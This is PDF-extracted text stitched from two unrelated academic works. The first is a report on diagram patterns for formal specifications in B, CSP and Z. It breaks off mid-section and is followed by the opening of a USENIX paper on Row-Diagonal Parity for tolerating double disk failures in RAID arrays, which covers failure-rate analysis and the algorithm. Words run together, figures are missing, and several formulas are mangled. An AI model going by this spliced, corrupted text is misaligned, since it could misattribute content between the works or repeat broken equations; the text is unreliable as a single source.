this4Chapter1.Introduction Item Relationship Examplepolygon line,arrow UML class diagram,Cleanroom diagramboxes lines,position Jackson structurespolygon polygon Venn diagrampolygon(position)activity diagrambox arrow commuting squareTable1.3Examples of concrete representations of items and relationships observation,that diagrams represent items and relationships using graphical sym-bols,to define a pattern for defining diagrams(section1.4).It is useful to remember that an abstract syntax can be represented by more than one concrete syntactic scheme.Equally,one concrete syntax can be used to rep-resent different abstract concepts.This is both a strength and a weakness of structural diagrams.Metaphors can be introduced into new diagram styles with the deliberate intention of referencing another abstract syntax;however,metaphor-ical usage can also be assumed where none is intended.For example,dataflow diagrams(in SSADM[CCTA1990,Goodland&Slater1995]or Yourdon[Your-don1989])represent processes as boxes or ellipses,and dataflow as arrows;many readers assume that the relative location of the processes on the page implies an ordering in their calling;in fact,there is no notational convention(in the cited methods)for identifying the triggering input(s)of a process or a sequence of pro-cesses.A pattern gives a concise summary of the author’s intent for the notation, and may counter such mis-readings.Observe that diagrams that try to express three concepts(perhaps,items plus static and temporal relationships)tend to be harder to read and construct than those which express only two concepts.For example,Jackson diagrams,used for entity life histories in methods such as SSADM,represent life-cycle components as boxes,organised into hierarchies using lines for static links.The life-cycle of an entity is described by the left-right position of the lowest leaves of every subtree in the hierarchy.1.4Meta-pattern ideas5 1.4Meta-pattern ideasIn[Stepney et al.2003c],[Stepney et al.2003a]we introduce a terminology and notation for formal specification patterns.Textually,each pattern has a double bar header,several line-delimited sections,and ends with a2.Here we extend that notation to allow meta-patterns:patterns for writing patterns.The approach is similar to the general-purpose“pattern language for writing patterns”of[Meszaros &Doble1998].The meta-pattern is itself a pattern(distinguished from an ordinary pattern by its triple bar header),and its solution part includes an ordinary pattern template that can be instantiated to produce specific patterns.Our meta-pattern for writing diagram patterns that capture the structural aspects of formal specifications is called Design the diagram.Design the diagramIntentGive guidance for writing instantiated Diagram the structure patterns for particular formal modelling concepts.ProblemIt is difficult to visualise the structure of a large,complex specification.It can also be difficult to comprehend the details at a lower level.Diagrams help in many cases,but it is important that the diagram provides the right level of abstraction, and does not hinder understanding.Solution•Identify the Items and Relationships to be represented in a diagram.•Identify how Items and Relationships are to be represented•Instantiate the following template pattern,by providing values for the parts in angle brackets:X :Diagram the structure6Chapter1.Introduction IntentSummarise[the A aspect of]the structure of a X specification using a diagram.ProblemAn explanation of why that aspect of the structure benefits from being expressed diagrammatically.[Example]A typical case of a description(specification etc)that contains thestructure but in which the structure is not as clear as it could be.Solution•The items are ITEM .Represent them as DIAGRAM ELEMENT(ITEM) .[Label them with ITEM LABEL .]•The relationships are RELN .Represent them as as DIAGRAMELEMENT(RELN) .[Label them with RELN LABEL .]•[Use EMPH to emphasise aspects of interest.]IllustrationDiagram the pattern structureDiagram the example instance of the problem[Constraint]Give cases where the pattern is not useful.[Variants]•When the specification contains VAR ,use DIAGRAM ELEMENT(VAR) to diagram it.•Elide DIAGRAM ELEMENT under CIRCUMSTANCE .[Related pattern]If the recommended pattern is derived from an existing diagram-matic pattern,make the derivation clear:this should illuminate metaphor-ical aspects if these exist.1.4Meta-pattern ideas7[Specimens]Give examples in the literature where these,or similar,diagrams are used or defined.2IllustrationThe rest of this paper gives instantiations of this pattern.ConstraintThis pattern applies only to things that follow the‘item,relationship’metamodel. Don’t try to diagram too much detail.Related patternThe generated pattern should be a sub-pattern of a structural,or chunking,pattern in the relevant notation.2To illustrate instantiation of the meta-pattern,we choose examples drawn from the B,CSP and Z specification languages,and from the Circus(Z+CSP)and CSP||B (B+CSP)combined languages.Chapter2Application of Diagram Patterns to BIn the B method[Abrial1996],[Schneider2001],language and usage is tightly constrained to facilitate automated construction and discharge of proofs of consis-tency.In effect,the principal patterns of usage are built into the method by the support tools.The aspect of B that can be most enhanced by diagrams is the structure of machines within a specification(or development–the B method supports specification,re-finement and code generation).A number of diagrammatic styles appear in the leau et al.[Laleau2002],[Facon et al.2000]use boxes to represent machines,and different styles of arrow to represent different machine structurings. An alternative diagrammatic approach,using nested ellipses and arrows,is used in [Polack2003].Here,we present a pattern based on diagrams in[Schneider2001]. B:Diagram the structureIntentSummarise the machine structuring of a B specification using a diagram.ProblemA B specification may comprise many machines,interlinked by B concepts such as USES,INCLUDES,EXTENDS and PROMOTES.The overall machine structure is hard to deduce from the B notation alone(or from machine dependency summaries produced by existing support tools).Example89 The following extends Schneider’s registrar example[Schneider2001,chapter11]. The specification comprises B machines modelling aspects of a population registra-tion system.We summarise the relevant B machines,giving only their structuring clauses,key state elements,and operation headers.A machine,Life,defines the variables man and woman,and operations born and die that add and delete instances:MACHINE LifeSETS PERSON;SEX={male,female}V ARIABLES man,woman...OPERATIONSborn()die()ENDThe machine Marriage needs access to the Life data structure but does not change its state;it has a USES clause referencing Life:MACHINE MarriageUSES LifeV ARIABLES marriage...OPERATIONSwed()part()partner()ENDThe overall system machine,Registrar,specifies an interface to the operations of the Life and Marriage machines.The EXTENDS clause indicates that the Marriage machine is included,such that all its operations are promoted unaltered to the interface of Registrar.Registrar defines the effect on a marriage of the death of one of the partners in the externally-visible operation,dies.This calls the die operation of the Life machine.Registrar gains access to the operations of Life using an INCLUDES clause.The other operation of Life,namely born,is promoted to the interface in a PROMOTES clause.10Chapter2.Application of Diagram Patterns to B MACHINE RegistrarEXTENDS MarriageINCLUDES LifePROMOTES bornOPERATIONSdies()ENDFinally,there is an independent Dating machine.This machine accesses data relating to unmarried individuals,and provides an operation,match.Dating has its own interface to the outside world:MACHINE DatingUSES Marriage,LifeV ARIABLES boyfriend,girlfriend...OPERATIONSmatch()ENDThe example demonstrates the different ways by which machines are interlinked: USES for accessing but not changing state;INCLUDES for access to operations, with PROMOTES to indicate which operations are externally visible to the in-cluding machine;EXTENDS to encompass INCLUDES and PROMOTES when all operations of the included machine are to be promoted.The nesting and the external interfaces are difficult to visualise in the standard machine structures. SolutionUse boxes to represent B machines.Represent interfaces among machines as fol-lows:•represent INCLUDES,and the including element of EXTENDS,by nesting the included machine inside the including machine•indicate USES by an arrow from the using to the used machineIn addition,show the operations of each machine as tabs from the side of the ma-chine in which they are defined,protruding as far as they are accessible.Thus, the operations of a machine that is referenced in the EXTENDS clause of an-11part wed dies bornpartnerdie matchRegistrarDatingMarriageLifeFigure 2.1B diagram:the example’s B machine structure (extended from[Schneider 2001,p171])other machine protrude to the outside of the extending machine,as do operations referenced in a PROMOTES clause.Label machines and operations with names from the B machines.Use positioning to emphasise aspects of interest.For example,it may be helpful to direct USES arrows downwards from the using to the used machine.IllustrationFigure 2.1extends the diagram from Schneider’s example;the Dating machine has been added to illustrate the USES clause in full.ConstraintBecause of the nesting of boxes,the diagrams would be inappropriate for high degrees of machine inclusion.2Chapter3Application of Diagram Patterns to CSPCommunicating Sequential Processes(CSP)[Hoare1985],[Roscoe1997],[Schnei-der2000]is an algebra for expressing features of concurrent systems,including protocols and other communicating programs.The commercial potential of CSP is enhanced by Roscoe’s model checker,FDR,which analyses the failure-divergence refinements of CSP specifications[FDR2000],[Roscoe1994].CSP models processes and traces.To date,we have not found any useful diagrams for CSP trace models.This may be an example of where the textual form is more useful than a diagrammatic form.However,CSP process models do lend themselves to the use of diagrams(as,indeed,was recognised by CSP’s inventor [Hoare1985,section1.2]).See also[Brooke&Paige2002].A CSP process specification has two main levels of structure.•a single sequential process and its state transitions•a collection of processes communicating by shared events on named channels We define a pattern for each of these,and then illustrate their combination into the full CSP pattern.123.1Processes:state transitions13 3.1Processes:state transitionsCSP Transitions:diagram the structureIntentSummarise the structure of a CSP process state transition specification using a diagram.ProblemA CSP process specification contains a description of a process’s internal behaviour. It can be difficult to determine the structure of a whole process from the structure of its parts.SolutionThe representation of states and state transitions is adapted from the Harel Stat-echart[Harel1987]and UML state diagrams[Booch et al.1999]notations.•Represent states as rounded boxes,labelled with the state name.•Represent transitions as arrows between the states,labelled with the events and guards.Indicate the initial state by an incoming arrow,if necessary.Label the arrow with an event,or sequence of events,or choice of events,if appropriate.•Indicate termination by an outgoing arrow,to a successful termination Skip symbol(circle)or a deadlock Stop symbol(square).IllustrationFigure3.1illustrates these components for a process P defined as follows.P=e→RR=(f→g→S)2(h→Q)2(j→Q)S=term→Skip14Chapter3.Application of Diagram Patterns to CSPFigure3.1CSP Transitions:a sequential process,showing event transitions,states,and Skip and Stop termination.Q=die→StopVariant:InterruptsCommunication protocols often require the modelling of interrupts–higher-priority events or transitions that must be serviced before the current event has been fully serviced.Represent interrupts as transitions from outer boxes(the Harel conven-tion).For example,[Schneider2000,section3.4]specifies a writing protocol with an interrupt:processVar=write?x→(Var(x) Var)processVar(x)=read!x→Var(x)The interrupting transition is shown infigure3.2as an event arrow from the outer box,having‘higher priority’than the transition from the inner box.A more complex interrupt structure is modelled in the Junior2specification of[Schnei-der2000,section3.4]:processJunior=Tasks x:{ring,boss}→P(x)3.1Processes:state transitions15Figure3.2CSP Transitions:Schneider’s Var specification.Figure3.3CSP Transitions:Schneider’s JUNIOR specification.processTasks=tea→Tasks2copying→Tasks2filing→TasksprocessP(ring)=message→JuniorP(boss)=takeCoat→hangCoat→JuniorprocessJunior2=Junior fire→(real→home→Skip2drill→Junior2)The two levels of interrupting transition are clear infigure3.3.216Chapter3.Application of Diagram Patterns to CSP 3.2Processes:communication channelsCSP channels:diagram the structureIntentSummarise the structure of a CSP channel communication specification using a diagram.ProblemCSP specifications contain descriptions of processes communicating with others using a variety of shared synchronised events.It can be difficult to determine the structure of a whole specification by examining the structure of its processes. SolutionThe representation of processes and communication channels is an obvious gener-alisation of the kind of block diagrams used by CSP authors[Schneider2000].•Enclose each sequential process in a rectangular box.•Draw replicated processes with overlapped boxes.•Indicate the communication channels as lines between communicating process boxes,with arrows if the communication has a direction(rather than being just a synchronisation event).•Draw hidden channels inside the box representing the process that hides them.Extend externally visible channels outside the process box.•By default,do not distinguish replicated channels from single channels:the CSP gives the details.IllustrationFigure3.4illustrates these components for a process OuterProc defined asProc(n) Proc2)\{mid}OuterProc=(nwhere the Proc(i)have channels in and mid,and Proc2has channels mid and out.3.2Processes:communication channels17Figure3.4CSP Channels:parallel communicating processes,showing repli-cated processes and channels.Figure3.5CSP Channels:a Dining philosophers specification.The philoso-pher and fork processes are replicated.Variants:Replication•Indicate replicated channels with multiple heads or tails,if necessary(not illustrated).•‘Explode’replicated or labelled processes to show the constituent parts,if necessary.For example,figure3.5shows the well-known dining philosophers example[Hoare1985,section2.5],drawn with replicated processes;figure3.6 shows an exploded variant.218Chapter3.Application of Diagram Patterns to CSPFigure 3.6CSP Channels:exploded variant of the Dining philosophersspecification.The philosopher and fork processes are unfolded into separateprocesses.3.3Processes:full diagramsCSP:diagram the structureIntentSummarise the structure of a CSP specification using a diagram.ProblemCSP specifications contain descriptions of various processes,each with its own3.3Processes:full diagrams19 internal behaviour,each communicating with certain others on a variety of shared synchronised events.It can be difficult to determine the structure of a whole specification from the structure of the processes and their parts.Solution•Use CSP Transitions:diagram the structure for the internal structure of a single process•Use CSP Channels:diagram the structure for the communication structure between parallel processes(enclose the relevant process CSP Transitions di-agram in the communicating process rectangular box)•When two specifications have a refinement relationship between them,draw the individual specifications as before,and indicate the refinement relation-ship by position on the page,by drawing the more abstract specification above the more concrete specification,and drawing the appropriate refine-ment symbol between them•If it is necessary to emphasise the state transitions over the communications, reverse the weights of the arrows.IllustrationFigure3.7illustrates the CSP Purse specification from[Srivatanakul et al.2003], given in appendix B.An exploded variant of the Purse diagram,figure3.8,shows how the various sub-states engage in the parallel composition.220Chapter 3.Application of Diagram Patterns to CSPFDFigure 3.7CSP diagram:the Purse specification.Sequential processes are shown as state transition diagrams;parallel communication channels are bold arrows;refinement is shown by relative position3.3Processes:full diagrams21Figure3.8CSP diagram:the refined CSP Purse specification,explodedview.The Purse state is unfolded into separate parallel processes;the sub-states are shown in the appropriate process.Chapter4Application of Diagram Patterns to ZThe Z notation is similar in origin to B,but does not have the constraining influence of mechanised proof obligation generation.Z is used to produce precise butflexible specifications,that can support refinement and proof if needed.Implicit patterns of use have emerged in Z texts[Spivey1992],[Barden et al.1994],and in tool implementations.4.1Z graphical notationThe Z formal notation already includes a graphical component,in that certain chunks of specification(vertical schemas)are enclosed in boxes:SchemaNamedeclaration1declaration2...predicate1predicate2...This notation aids the readability of Z,by making the separation between the schema items obvious.However,the relationship between the items is not very clear.The diagram patterns are designed to overcome this limitation for a variety of ways of defining items and their relationships in Z.224.2The Delta/Xi pattern23 4.2The Delta/Xi patternThefirst Z pattern provides diagrammatic summaries of the most common style of Z specification,the state-and-operations or Delta/Xi style.This comprises schemas defining the state(as above).Operations are also defined in schemas which use the names of state schemas,prefixed with∆(if the operation can change the state)orΞ(if the operation does not change the state).The prefix indicates the introduction of before-and after-states,and,in the case ofΞ,predicates equating the components of the before state to those of the after state.In addition,any named schema can be included in other schemas(declarations are concatenated;predicates are conjoined),and can be used in most Z structures requiring a mathematical set or relation.The Delta/Xi pattern underlies many other patterns,including promotion and refinement patterns[Stepney et al.2003b],[Stepney et al.2003c].Some of these give rise to variants,or to separate diagram patterns.Delta/Xi:diagram the structureIntentSummarise the structure of a Delta/Xi specification using a diagram.ProblemA Z specification is written‘bottom-up’(declaration before use)and can be fac-tored into many ponents are included in various other components,so that it becomes difficult to see the overall structure.SolutionThe diagram records the structure of the state and operation schemas,highlighting any Delta/Xi-related patterns used.The notation is adapted and extended from that used by[d’Inverno&Luck2001].Use different polygons to distinguish kinds of schema purpose:24Chapter4.Application of Diagram Patterns to Z•Draw state schemas as named rectangles•Draw operation schemas as named hexagons•Draw other data types as named parallelograms•Where appropriate for clarity,use extra structuring schemas not defined in the specification.Indicate these by a dashed box.(Use of the Delta/Xi:strict convention sub-pattern means that∆S andΞS boxes are always dashed.The occurrence of other dashed boxes might indicate a refactoring opportunity.) Use arrows to represent structural links:•for schema inclusion,use solid arrows pointing from the including schema to the included schema–for state inclusion,use a single line–for an operation including a state schema,S,via∆S(and thus intro-ducing a before-and an after-state),use a double line and a triangular‘Delta’arrowhead,pointing to the rectangle,S.–for an(initialisation)operation that includes only an after-state(S ),usea single line and an after-state by the arrowhead–for clarity,elide an arrow directly to a box if there is an alternative pathto that box•Indicate other relationships among schemas by dashed lines from the referring construct to the referenced schemaUse highlighting(line thickness,box shading)to distinguish important parts of the diagram•If a description uses a pattern described with a related or derived diagram-matic form,the diagram of the description can be constructed by instantiating the structure of the e highlighting to distinguish the pattern from other structural elements•Highlight the full operations,as contrasted to intermediate definitionsUse a positional convention.Where possible,without distorting the diagram,draw inclusion arrows upwards,so that the simplest schemas are at the top of the dia-gram,and constructs that are more complex are further down the page.(This is to help the reader;position is not intended to express any structural information.) Illustration。

USENIX AssociationProceedings of the Third USENIX Conference on File and Storage TechnologiesSan Francisco, CA, USAMarch 31–April 2, 2004© 2004 by The USENIX Association All Rights Reserved For more information about the USENIX Association: Phone: 1 510 528 8649FAX: 1 510 548 5738Email: office@ WWW: Rights to individual papers remain with the author or the author's employer.Permission is granted for noncommercial reproduction of the work for educational or research purposes.This copyright notice must be included in the reproduced paper. USENIX acknowledges all trademarks herein.Row-Diagonal Parity for Double Disk Failure Correction Peter Corbett,Bob English,Atul Goel,Tomislav Grcanac,Steven Kleiman,James Leong,and Sunitha SankarNetwork Appliance,Inc.AbstractRow-Diagonal Parity(RDP)is a new algo-rithm for protecting against double disk fail-ures.It stores all data unencoded,and uses only exclusive-or operations to compute par-ity.RDP is provably optimal in computa-tional complexity,both during construction and reconstruction.Like other algorithms, it is optimal in the amount of redundant in-formation stored and accessed.RDP works within a single stripe of blocks of sizes nor-mally used byfile systems,databases and disk arrays.It can be utilized in afixed(RAID-4) or rotated(RAID-5)parity placement style. It is possible to extend the algorithm to en-compass multiple RAID-4or RAID-5disk ar-rays in a single RDP disk array.It is possi-ble to add disks to an existing RDP array without recalculating parity or moving data. Implementation results show that RDP per-formance can be made nearly equal to single parity RAID-4and RAID-5performance.1IntroductionDisk striping techniques[1,2]have been used for more than two decades to reduce data loss due to disk failure,while improv-ing performance.The commonly used RAID techniques,RAID-4and RAID-5,protect against only a single disk failure.Among the standard RAID techniques,only mirrored stripes(RAID-10,RAID-01)provide protec-tion against multiple failures.However,they do not protect against double disk failures of opposing disks in the mirror.Mirrored RAID-4and RAID-5protect against higher order failures[4].However,the efficiency of the array as measured by its data capacity divided by its total disk space is reduced.In-creasing the redundancy by small increments per stripe is more cost effective than adding redundancy by replicating the entire array[3]. The dramatic increase in disk sizes,the rel-atively slower growth in disk bandwidth,the construction of disk arrays containing larger numbers of disks,and the use of less reliable and less performant varieties of disk such as ATA combines to increase the rate of double disk failures,as will be discussed in Section3. This requires the use of algorithms that can protect against double disk failures to en-sure adequate data integrity.Algorithms that meet information theory’s Singleton bound [6]protect against two disk failures by adding only two disks of redundancy to the num-ber of disks required to store the unprotected data.Good algorithms meet this bound,and also store the data unencoded,so that it can be read directly offdisk.A multiple orders of magnitude improve-ment in the reliability of the storage system can simplify the design of other parts of the system for robustness,while improving over-all system reliability.This motivates the use of a data protection algorithm that protects against double disk failures.At the same time,it is desirable to maintain the simplic-ity and performance of RAID-4and RAID-5 single parity protection.This paper describes a new algorithm, called Row-Diagonal Parity,or RDP,for pro-tection against double failures.RDP applies to any multiple device storage system,or even to communication systems.In this paper,we focus on the application of RDP to disk array storage systems(RAID).RDP is optimal both in computation and in I/O.It stores user data in the clear,andrequires exactly two parity disks.It uti-lizes only exclusive-or operations during par-ity construction as well as during reconstruc-tion after one or two failures.Therefore,it can be implemented easily either in dedicated hardware,or on standard microprocessors.It is also simple to implement compared to pre-vious algorithms.While it is difficult to mea-sure the benefit of this,we were able to im-plement the algorithm and integrate it into an existing RAID framework within a short product development cycle.In this paper,we make the case that the need for double disk failure protection is in-creasing.We then describe the RDP algo-rithm,proving its correctness and analysing its performance.We present some simple ex-tensions to the algorithm,showing how to add disks to an existing array,and how to protect multiple RAID-4or RAID-5arrays against double failures with a single extra parity disk.Finally,we present some observa-tions from our experience implementing RDP, and give some performance results for that implementation.2Related WorkThere are several known algorithms that protect data against two or more disk fail-ures in an array of disks.Among these are EVENODD[5],Reed Solomon(P+Q)era-sure codes[6],DATUM[7]and RM2[8]. RDP is most similar to EVENODD.RM2dis-tributes parity among the disks in a single stripe,or equivalently,adds stripes of parity data that are interspersed among the data stripes.EVENODD,DATUM,and Reed-Solomon P+Q all share the property that the redundant information can be stored sepa-rately from the data in each stripe.This al-lows implementations that have dedicated re-dundant disks,leaving the other disks to hold only data.This is analogous to RAID-4,al-though we have two parity disks,not one.We will call this RAID-4style parity placement. Alternatively,the placement of the redun-dant information can be rotated from stripe to stripe,improving both read and write per-formance.We will call this RAID-5style par-ity placement.Both EVENODD and Reed-Solomon P+Q encoding compute normal row parity for one parity disk.However,they employ different techniques for encoding the second disk of re-dundant data.Both use exclusive-or oper-ations,but Reed-Solomon encoding is much more computationally intensive than EVEN-ODD[5].DATUM uses encodings that gen-erate any number of redundant information blocks.It allows higher order failure toler-ance,and is similar to Reed-Solomon P+Q encoding in the case of protection against two disk failures.RDP shares many of the properties of EVENODD,DATUM,and Reed-Solomon en-coding,in that it stores its redundant data (parity)separately on just two disks,and that data is stored in the clear on the other disks.Among the previously reported algo-rithms,EVENODD has the lowest compu-tational cost for protection against two disk failures.RDP improves upon EVENODD by further reducing the computational com-plexity.The complexity of RDP is prov-ably optimal,both during construction and reconstruction.Optimality of construction is important as it is the normal,failure free operational mode.However,the optimality of reconstruction is just as important,as it maximizes the array’s performance under de-graded failure conditions[9].3Double Disk Failure Modes and AnalysisDouble disk failures result from any com-bination of two different types of single disk failure.Individual disks can fail by whole-disk failure,whereby all the data on the disk becomes temporarily or permanently inacces-sible,or by media failure,whereby a small portion of the data on a disk becomes tem-porarily or permanently inaccessible.Whole-disk failures may result from a problem in the disk itself,or in the channel or network connecting the disk to its containing system. While the mode and duration of the failures may vary,the class of failures that make thedata on a disk unaccessible can be catego-rized as one failure type for the purposes of re-covery.Whole-disk failures require the com-plete reconstruction of a lost disk,or at least those portions of it that contain wanted data. This stresses the I/O system of the controller, while adding to its CPU load.(We will refer to the unit that performs construction of par-ity and reconstruction of data and parity as the controller.)To maintain uninterrupted service,the con-troller has to serve requests to the lost disk by reconstructing the requested data on de-mand.At the same time,it will reconstruct the other lost data.It is desirable during reconstruction to have a low response time for the on-demand reconstruction of individ-ual blocks that are required to service reads, while at the same time exhibiting a high throughput on the total disk reconstruction. Whole-disk failure rates are measured as an arrival rate,regardless of the usage pattern of the disk.The assumption is that the disk can go bad at any time,and that once it does, the failure will be noticed.Whole disk fail-ure rates are the reciprocal of the Mean Time To Failure numbers quoted by the manufac-turers.These are typically in the range of 500,000hours.Media failures are qualitatively and quan-titatively different from whole-disk failures. Media failures are encountered during disk reads and writes.Media failures on write are handled immediately,either by the disk or by the controller,by relocating the bad block to a good area on disk.Media failures on read can result in data loss.While a media failure only affects a small amount of data,the loss of a single sector of critical data can compromise an entire system.Handling media failures on read requires a short duration recovery of a small amount of missing data.The emphasis in the recovery phase is on response time,but reconstruction throughput is generally not an issue.Disks protect against media errors by relo-cating bad blocks,and by undergoing elabo-rate retry sequences to try to extract data from a sector that is difficult to read[10]. Despite these precautions,the typical media error rate in disks is specified by the man-ufacturers as one bit error per1014to1015 bits read,which corresponds approximately to one uncorrectable error per10TBytes to 100TBytes transferred.The actual rate de-pends on the disk construction.There is both a static and a dynamic aspect to this rate. It represents the rate at which unreadable sectors might be encountered during normal read activity.Sectors degrade over time,from a writable and readable state to an unread-able state.A second failure can occur during recon-struction from a single whole-disk failure.At this point,the array is in a degraded mode, where reads of blocks on the failed disk must be satisfied by reconstructing data from the surviving disks,and commonly,where the contents of the failed disk are being recon-structed to spare space on one or more other disks.If we only protect against one disk fail-ure,a second complete disk failure will make reconstruction of a portion of both lost disks impossible,corresponding to the portion of thefirst failed disk that has not yet been re-constructed.A media failure during recon-struction will make reconstruction of the two missing sectors or blocks in that stripe im-possible.Unfortunately,the process of recon-struction requires that all surviving disks are read in their entirety.This stresses the array by exposing all latent media failures in the surviving disks.The three double disk failure combina-tions are:whole-disk/whole-disk,whole-disk/media,and media/media.A properly implemented double failure protection algo-rithm protects against all three categories of double failures.In our analysis of failure rates,we discount media/media failures as being rare relative to the other two double failure modes.Whole-disk/whole-disk and whole-disk/media failures will normally be encountered during reconstruction from an already identified whole-disk failure.RAID systems can protect against dou-ble failures due to media failures by period-ically“scrubbing”their disks,trying to read each sector,and reconstructing and relocat-ing data on any sector that is unreadable.Do-ing this before a single whole-disk failure oc-curs can preempt potential whole-disk/media failures by cleansing the disks of accumulated media errors before a whole-disk failure oc-curs.Such preventive techniques are a nec-essary precaution in arrays of current large capacity disks.The media and whole-disk failure rates as-sume uniform failure arrivals over the lifetime of the disk,and uniform failure arrival rates over the population of similar disks.Actual whole-disk failure rates conform to a bathtub curve as a function of the disk’s service time: A higher failure rate is encountered during the beginning-of-life burn-in and end-of-life wear-out periods.Both of these higher rate periods affect the double disk failure rate,as the disks in an array will typically be the same age,and will be subject to the same us-age pattern.This tends to increase the corre-lation of whole-disk failures among the disks in an array.Disks in the array may be from the same manufacturing batch,and therefore may be subject to the same variations in manufac-turing that can increase the likelihood of an individual disk failing.Disks in an array are all subject to the same temperature,humidity and mechanical vibration conditions.They may all have been subjected to the same me-chanical shocks during transport.This can result in a clustering of failures that increases the double failure rate beyond what would be expected if individual disk failures were un-correlated.Once a single disk fails,the period of vul-nerability to a second whole-disk failure is de-termined by the reconstruction time.In con-trast,vulnerability to a media failure isfixed once thefirst disk fails.Reconstruction will require a complete read of all the surviving disks,and the probability of encountering a media failure in those scans is largely inde-pendent of the time taken by reconstruction. If the failures are independent,and wide sense stationary[12],then it is possible to derive the rate of occurance of two whole-disk failures as[2]:λ2≈λ21t r c n(n−1)2(1)where t r is the reconstruction time of a faileddisk,n is the total number of disks in the ar-ray,λ1is the whole-disk failure rate of onedisk,and c is a term reflecting the correla-tion of the disk failures.If whole-disk fail-ures are correlated,then the correction factorc>1.We know from experience that whole-disk failures are not stationary,i.e.,they de-pend on the service time of the disk,and alsothat they are positively correlated.These fac-tors will increase the rateλ2.The other consideration is that the recon-struction time t r is a function of the totaldata that must be processed during recon-struction.t r is linearly related to the disksize,but also can be related to the numberof disks,since the total data to be processedis the product dn,where d is the size of thedisks.For small n,the I/O bandwidths of theindividual disks will dominate reconstructiontime.However,for large enough n,the ag-gregate bandwidth of the disks becomes greatenough to saturate either the I/O or process-ing capacity of the controller performing re-construction.Therefore,we assert that:t r=d/b r if n<mdn/b s n≥m(2)m=b sb rwhere b r is the maximum rate of reconstruc-tion of a failed disk,governed by the disk’swrite bandwidth and b s is the maximum rateof reconstruction per disk array.The result for disk arrays larger than m is:λ2≈λ21dc2b sn2(n−1)(3)The whole-disk/whole-disk failure rate has acubic dependency on the number of disks inthe array,and a linear dependency on the sizeof the disks.The double failure rate is re-lated to the square of the whole-disk failurerate.If we employ disks that have higher fail-ure rates,such as ATA drives,we can expectthat the double failure rate will increase pro-portionally to the square of the increase insingle disk failure rate.As an example,if the primary failure rateis one in500,000hours,the correlation fac-tor is1,the reconstruction rate is100MB/s,in a ten disk array of240GByte disks,the whole-disk/whole-disk failure rate will be ap-proximately1.2×10−9failures per hour.Both the size of disks and their I/O band-width have been increasing,but the trend over many years has been that disk size is increasing much faster than the disk media rate.The time it takes to read or write an entire disk is the lower bound on disk recov-ery.As a result,the recovery time per disk has been increasing,further aggravating the double disk failure rate.The rate of whole-disk/media failures is also related to disk size and to the number of disks in the array.Essentially,it is the rate of single whole-disk failures,multiplied by the probability that any of those failures will re-sult in a double failure due to the inability to read all sectors from all surviving disks.The single whole-disk failure rate is proportional to the number of disks in the array.The me-dia failure rate is roughly proportional to the total number of bits in the surviving disks of the array.The probability of all bits being readable is(1−p)s where p is the probability of an individual bit being unreadable,and s is the number of bits being read.This gives the a priori rate of whole-disk/media double failures:f2=λ1n(1−(1−p)(n−1)b)(4) where b is the size of each disk measured in bits.For our example of a primary failure rate of1in500,000hours,a10disk array,240 GB disks,and a bit error rate of1per1014 gives a whole-disk/media double failure rate of3.2×10−6failures per hour.In our example,using typical numbers,the rate of whole-disk/media failures dominates the rate of whole-disk/whole-disk failures. The incidence of media failures per whole-disk failure is uncomfortably high.Scrubbing the disks can help reduce this rate,but it re-mains a significant source of double disk fail-ures.The combination of the two double fail-ure rates gives a Mean Time To Data Loss (MTTDL)of3.1×105hours.For our exam-ple,this converts to an annual rate of0.028 data loss events per disk array per year due to double failures of any type.To compare,the dominant triple failure mode will be media failures discovered dur-ing recovery from double whole-disk failures. This rate can be approximated by the analog to Equation4:f3=λ2(1−(1−p)(n−2)b)(5) Substitutingλ2from Equation1gives:f3≈λ21dc2b sn2(n−1)(1−(1−p)(n−2)b)(6)For our example,the dominant component of the tertiary failure rate will be approxi-mately1.7×10−10failures per hour,which is a reduction of over four orders of magnitude compared to the overall double failure rate. The use of less expensive disks,such as ATA disks,in arrays where high data in-tegrity is required has been increasing.The disks are known to be less performant and less reliable than SCSI and FCP disks[10].This increases the reconstruction time and the in-dividual disk failure rates,in turn increasing the double failure rate for arrays of the same size.4Row-Diagonal Parity Algo-rithmThe RDP algorithm is based on a simple parity encoding scheme using only exclusive-or operations.Each data block belongs to one row parity set and to one diagonal par-ity set.In the normal configuration,there is one row parity block and one diagonal parity block per stripe.It is possible to build either RAID-4or RAID-5style arrays using RDP, by either locating all the parity blocks on two disks,or by rotating parity from disk to disk in different stripes.An RDP array is defined by a controlling parameter p,which must be a prime number greater than2.In the simplest construction of an RDP array,there are p+1disks.WeData Data Data Data Row Diag. Disk Disk Disk Disk Parity Parity 0123012340123401234012340123 Figure1:Diagonal Parity Set Assignments in a6Disk RDP Array,p=5define stripes across the array to consist of one block from each disk.In each stripe,one block holds diagonal parity,one block holds row parity,and p−1blocks hold data.The bulk of the remainder of this paper describes one grouping of p−1stripes that includes a complete set of row and diagonal parity sets.Multiple of these stripe groupings can be concatenated to form either a RAID-4 style or RAID-5style array.An extension to multiple row parity sets is discussed in Sec-tion7.Figure1shows the four stripes in a6disk RDP array(p=5).The number in each block indicates the diagonal parity set the block belongs to.Each row parity block con-tains the even parity of the data blocks in that row,not including the diagonal parity block. Each diagonal parity block contains the even parity of the data and row parity blocks in the same diagonal.Note that there are p=5 diagonals,but that we only store the parity of p−1=4of the diagonals.The selection of which diagonals to store parity for is com-pletely arbitrary.We refer to the diagonal for which we do not store parity as the“missing”diagonal.In this paper,we always select di-agonal p−1as the missing diagonal.Since we do not store the parity of the missing di-agonal,we do not compute it either.The operation of the algorithm can be seen by example.Assume that data disks1and3 have failed in the array of Figure1.It is nec-essary to reconstruct from the remaining data and parity disks.Clearly,row parity is use-less in thefirst step,since we have lost two members of each row parity set.However, since each diagonal misses one disk,and all diagonals miss a different disk,then there are two diagonal parity sets that are only missing one block.At least one of these two diago-nal parity sets has a stored parity block.In our example,we are missing only one block from each of the diagonal parity sets0and 2.This allows us to reconstruct those two missing blocks.Having reconstructed those blocks,we can now use row parity to reconstruct two more missing blocks in the two rows where we reconstructed the two diagonal blocks:the block in diagonal4in data disk3and the block in diagonal3in data disk1.Those blocks in turn are on two other diagonals:di-agonals4and3.We cannot use diagonal4 for reconstruction,since we did not compute or store parity for diagonal4.However,us-ing diagonal3,we can reconstruct the block in diagonal3in data disk3.The next step is to reconstruct the block in diagonal1in data disk1using row parity,then the block in diagonal1in data disk3,thenfinally the block in diagonal4in data disk1,using row parity.The important observation is that even though we did not compute parity for diago-nal4,we did not require the parity of diag-onal4to complete the reconstruction of all the missing blocks.This turns out to be true for all pairs of failed disks:we never need to use the parity of the missing diagonal to complete reconstruction.Therefore,we can safely ignore one diagonal during parity con-struction.5Proof of CorrectnessLet us formalize the construction of the ar-ray.We construct an array of p+1disks divided into blocks,where p is a prime 